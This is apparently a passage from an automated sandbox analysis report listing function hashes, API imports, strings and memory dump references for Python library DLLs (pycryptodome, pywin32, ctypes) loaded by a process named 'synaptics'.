                                                                                                                                                                                                              • Opcode ID: e95872fa214e80b0cbe151ac752e1d873b9ecfad6d9c03eb9dec5642c2dabe4d
                                                                                                                                                                                                              • Instruction ID: a4c2b70dab0896c9dedf99eb1e7ab4098c43a3e11c44e9bac04c1fd18b2d9a52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e95872fa214e80b0cbe151ac752e1d873b9ecfad6d9c03eb9dec5642c2dabe4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BE065727080459B8F019BA8DE4C8EDB7B8EF8765AB100056FD0AC2200DF3789159B99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6BF83F37
                                                                                                                                                                                                                • Part of subcall function 6BF852B0: memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?,?,?,?,?,6BF83F4C,00000000,?,?,?), ref: 6BF852D8
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6BF83F56
                                                                                                                                                                                                                • Part of subcall function 6BF85450: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t_nw >= a_nw + 2,D:\a\pycryptodome\pycryptodome\src\multiply_32.c,0000008F,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF8547D
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854A3
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854B8
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,?), ref: 6BF85520
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t[2*nw] <= 1,D:\a\pycryptodome\pycryptodome\src\mont.c,000000D3), ref: 6BF84169
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF8415F
                                                                                                                                                                                                              • t[2*nw] <= 1, xrefs: 6BF84164
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_wassert$memset
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\mont.c$t[2*nw] <= 1
                                                                                                                                                                                                              • API String ID: 3586389565-3556676888
                                                                                                                                                                                                              • Opcode ID: 12ff3c61caf7d52b80287fe9474d7fcdb270764cb136f977c81c52735f3515d6
                                                                                                                                                                                                              • Instruction ID: e363fe8f8c0ef42d866b17e31408b05265b25cceff198e57172562d7759fcea8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12ff3c61caf7d52b80287fe9474d7fcdb270764cb136f977c81c52735f3515d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7912472A083009FD314CF19C881A5BBBFAAFC9308F54892DF59997321E735E9048B96
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000), ref: 6BF85763
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(partial > 0,D:\a\pycryptodome\pycryptodome\src\endianess.h,00000108), ref: 6BF857CA
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000008), ref: 6BF85804
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • partial > 0, xrefs: 6BF857C5
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\endianess.h, xrefs: 6BF857C0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassertmemcpymemset
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\endianess.h$partial > 0
                                                                                                                                                                                                              • API String ID: 1809902113-2682289033
                                                                                                                                                                                                              • Opcode ID: c20086d11882c2a74d3effe835973cab55519da5d10b878bcdef1ef5ef3227a5
                                                                                                                                                                                                              • Instruction ID: 64cf17cf1639ace41527f425b9d7393deb4d1aa56fd914a8962ffbbe78d69886
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c20086d11882c2a74d3effe835973cab55519da5d10b878bcdef1ef5ef3227a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57410833A042559FDB00DF3CD891A6EB7B1EF95310F84C599E8498B255D739EA08C7A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(hs->curlen < BLOCK_SIZE,src/MD5.c,0000010B,00000010,?,6BF31EE3), ref: 6BF3214D
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000040,00000010,00000010,?,6BF31EE3), ref: 6BF3219F
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000040,00000010,00000010,?,6BF31EE3), ref: 6BF321C2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3079308505.000000006BF31000.00000020.00000001.01000000.00000037.sdmp, Offset: 6BF30000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079115779.000000006BF30000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079418715.000000006BF33000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079607016.000000006BF34000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079797292.000000006BF35000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf30000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$_wassert
                                                                                                                                                                                                              • String ID: hs->curlen < BLOCK_SIZE$src/MD5.c
                                                                                                                                                                                                              • API String ID: 3746435480-3464417081
                                                                                                                                                                                                              • Opcode ID: bdfd70680e50f88e3742b4d5a244524c1e4f261fba295f36cb6a3b12b0782687
                                                                                                                                                                                                              • Instruction ID: 53cb917c193e9f1558f8cb18b6812f1e45eef6f9f6e3bced66d0f6bb33824fdb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdfd70680e50f88e3742b4d5a244524c1e4f261fba295f36cb6a3b12b0782687
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77213AB26007208FD734CF2DC885B4AB3E4AB48318F04482EE586C77A1D7B9E8548BD1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF47D60: IsValidSid.ADVAPI32(00000000,?,00000000,00000000,6BF47E9E,00000000), ref: 6BF47D68
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BF47EA1
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF47EC8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastValidmalloc
                                                                                                                                                                                                              • String ID: PySID:
                                                                                                                                                                                                              • API String ID: 814871005-3177475674
                                                                                                                                                                                                              • Opcode ID: d31f1674b696c208af36cc25bcfce309e86eadcc378fe180ae1b5ae9df5208e5
                                                                                                                                                                                                              • Instruction ID: 7d8a9cde49c22f4b1379ebaad48b8a17ea36254623959fccc37b2d50c14d7cde
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d31f1674b696c208af36cc25bcfce309e86eadcc378fe180ae1b5ae9df5208e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC11037A6102029BC704DB68D444B6BBBF5EFC5240F448AB9E809C7226E734DD19C7A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,(bbbbbb)b:Initialize,?,?,?,?,?,?), ref: 6BF4790F
                                                                                                                                                                                                              • InitializeSid.ADVAPI32(?,?,?), ref: 6BF47938
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(InitializeSid,00000000), ref: 6BF47948
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Error@@InitializeParseSizeTuple_U_object@@Win_
                                                                                                                                                                                                              • String ID: (bbbbbb)b:Initialize$InitializeSid
                                                                                                                                                                                                              • API String ID: 3283552722-750340051
                                                                                                                                                                                                              • Opcode ID: ed3a808479ab57b3191511f3df03636eaea4e7e66c23bd65453f3d86b854211b
                                                                                                                                                                                                              • Instruction ID: f8ba1b85839e950fda2e4882016576afda78b552d4108c3524d7436ac2ed2fbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed3a808479ab57b3191511f3df03636eaea4e7e66c23bd65453f3d86b854211b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D01133735282029FD709EF28C851DAB77E8EF59314F80494DF59A82162EB34E51CCB53
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:Initialize), ref: 6BF46989
                                                                                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 6BF4699D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DescriptorInitializeParseSecurityTuple
                                                                                                                                                                                                              • String ID: :Initialize
                                                                                                                                                                                                              • API String ID: 3008588735-3583518544
                                                                                                                                                                                                              • Opcode ID: 2826c48cdc5b9553eca0a0140932dbd2afb621dce0d46c3ea518f31239d7a5cf
                                                                                                                                                                                                              • Instruction ID: 0ea30af0b005eb58297c76f303db1e5144bef4d8a67833666b384bbe1bb8017a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2826c48cdc5b9553eca0a0140932dbd2afb621dce0d46c3ea518f31239d7a5cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65019E73714311ABC7009F29D88065BBBA9EFC9B52B1004AEF908D3227D779D44986A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<%s object at %p>,?,?), ref: 6C0A704F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FormatFromUnicode_
                                                                                                                                                                                                              • String ID: %s(%R)$<%s object at %p>
                                                                                                                                                                                                              • API String ID: 3889672380-296555854
                                                                                                                                                                                                              • Opcode ID: 947a73bf1e1241fc70c12070bd34f6c80ecfdd4a6d5a5a661bd410d4ac30ae55
                                                                                                                                                                                                              • Instruction ID: 06e7e371ad89a0289b6ef7e5d6f9d76b8fd714f97af6d2e21d9021f638b6d509
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 947a73bf1e1241fc70c12070bd34f6c80ecfdd4a6d5a5a661bd410d4ac30ae55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7019E326002019FCB108BDEE809F9677F8EF8167AB088575E61DD7A22DB32E421CB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 6BF44871
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(?,?), ref: 6BF44896
                                                                                                                                                                                                              • PyObject_Print.PYTHON310(00000000,?,?), ref: 6BF448AB
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF448BA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharDeallocFromObject_PrintUnicode_Widewsprintf
                                                                                                                                                                                                              • String ID: <%hs at %Id (%Id)>
                                                                                                                                                                                                              • API String ID: 2754229576-3200932714
                                                                                                                                                                                                              • Opcode ID: 9bb04050abd146ff0762cdd945f399c471283aacb07403713d77ef31271558eb
                                                                                                                                                                                                              • Instruction ID: dae794edc23d42609ed57a6878d8a45cb5cf8a07921bfd57db1929f9756bc8c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bb04050abd146ff0762cdd945f399c471283aacb07403713d77ef31271558eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD01C4728102019FC764EF64CC09ECB7BA8EF99314F044959E44AC7262EB35D518CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7FE9C0,DEVMODE structure of size %d greater than supported size of %d,?,000000DC), ref: 6BF44273
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • DEVMODE structure of size %d greater than supported size of %d, xrefs: 6BF4426C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_Format
                                                                                                                                                                                                              • String ID: DEVMODE structure of size %d greater than supported size of %d
                                                                                                                                                                                                              • API String ID: 376477240-1470040908
                                                                                                                                                                                                              • Opcode ID: d02a1f47ad04fac0fedb224346d228bba47a4ba7eb53331be53e071e2077a901
                                                                                                                                                                                                              • Instruction ID: fb75a7c2fb5f61cc149986f2a606c582216556246e057bc37059afae4c57e8bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d02a1f47ad04fac0fedb224346d228bba47a4ba7eb53331be53e071e2077a901
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 510128739101219FDB10EF28D801AA77BE4EF45320F004559F895D3672E734DD54C792
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF49D0C
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6BF49D2F
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Buffer cannot be None), ref: 6BF49D50
                                                                                                                                                                                                              • PyObject_GetBuffer.PYTHON310(?,?,00000000), ref: 6BF49D63
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BufferBuffer_Err_FreeMem_Object_ReleaseString
                                                                                                                                                                                                              • String ID: Buffer cannot be None
                                                                                                                                                                                                              • API String ID: 987941384-305949699
                                                                                                                                                                                                              • Opcode ID: 5f527a8150bdbb0d938adf4a0729a035359cb663f344c24dd1ea344c073921e3
                                                                                                                                                                                                              • Instruction ID: 3729a819a22aa140363ae04f92d323f5dbd5d069f3f854c44b751911c84df3d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f527a8150bdbb0d938adf4a0729a035359cb663f344c24dd1ea344c073921e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 640180726102019FEB10DF18C948B47BBF4EF62715F00C869E4A9C7227CB38E569CB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,expected bytes, %s found,?), ref: 6C0AD2F1
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C0AD31E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • expected bytes, %s found, xrefs: 6C0AD2EA
                                                                                                                                                                                                              • bytes too long (%zd, maximum length %zd), xrefs: 6C0AD338
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_Formatmemcpy
                                                                                                                                                                                                              • String ID: bytes too long (%zd, maximum length %zd)$expected bytes, %s found
                                                                                                                                                                                                              • API String ID: 347768829-1985973764
                                                                                                                                                                                                              • Opcode ID: a545493b39f2f4c92e900450a0416d7d0ac48d4730d7c76c9950ed6921385b33
                                                                                                                                                                                                              • Instruction ID: 808022d2e318ac758ba7a806ad6f41cb274341de550bf8f1734b8ab3cdb66ef5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a545493b39f2f4c92e900450a0416d7d0ac48d4730d7c76c9950ed6921385b33
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8701B171208205AFDF08DF98DA45EA577F5EB4530CB044598FC098BA12DA33A8279B54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.set_errno,6C0B0588,?), ref: 6C0A9515
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,6C0B2224,?), ref: 6C0A9533
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A955E
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(?), ref: 6C0A9568
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_AuditDeallocFromLongLong_ParseSys_Tuple
                                                                                                                                                                                                              • String ID: ctypes.set_errno
                                                                                                                                                                                                              • API String ID: 928689845-1564666054
                                                                                                                                                                                                              • Opcode ID: f90d0ab8bf5375ffe95b91698233d0a515ec9723d7e3a310764555f72a6ab63c
                                                                                                                                                                                                              • Instruction ID: a2b4742797d64ec283f5a4755b84214ca4703f6508f2d68f1628194858a92bb6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f90d0ab8bf5375ffe95b91698233d0a515ec9723d7e3a310764555f72a6ab63c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1801D675A05104ABCB04DBF8AD066DA37FCEF0622CF0402A4ED0AE2641EB339A15C795
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.set_last_error,6C0B0588,?), ref: 6C0A95F5
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,6C0B2224,?), ref: 6C0A9613
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A9640
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(?), ref: 6C0A964A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_AuditDeallocFromLongLong_ParseSys_Tuple
                                                                                                                                                                                                              • String ID: ctypes.set_last_error
                                                                                                                                                                                                              • API String ID: 928689845-913187751
                                                                                                                                                                                                              • Opcode ID: 58b7b21799f5e2562f884c9eb4c963f8cd99709a88863c785c33872856d4db8e
                                                                                                                                                                                                              • Instruction ID: c45c06e33e6a45057b50dcccd99bafe85b90c8bf64898e15c5c77299c0af0850
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58b7b21799f5e2562f884c9eb4c963f8cd99709a88863c785c33872856d4db8e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2601D671A05104ABCB00DBE89E056DA77FCEF4622CB1486A4ED09E3651EB33DA16C6D6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6BF42282,0000000C), ref: 6BF4BDFF
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6BF42282,0000000C), ref: 6BF4BE0C
                                                                                                                                                                                                              • _CxxThrowException.VCRUNTIME140(?,6BF531DC), ref: 6BF4C7CB
                                                                                                                                                                                                              • _CxxThrowException.VCRUNTIME140(?,6BF53230), ref: 6BF4C7E8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
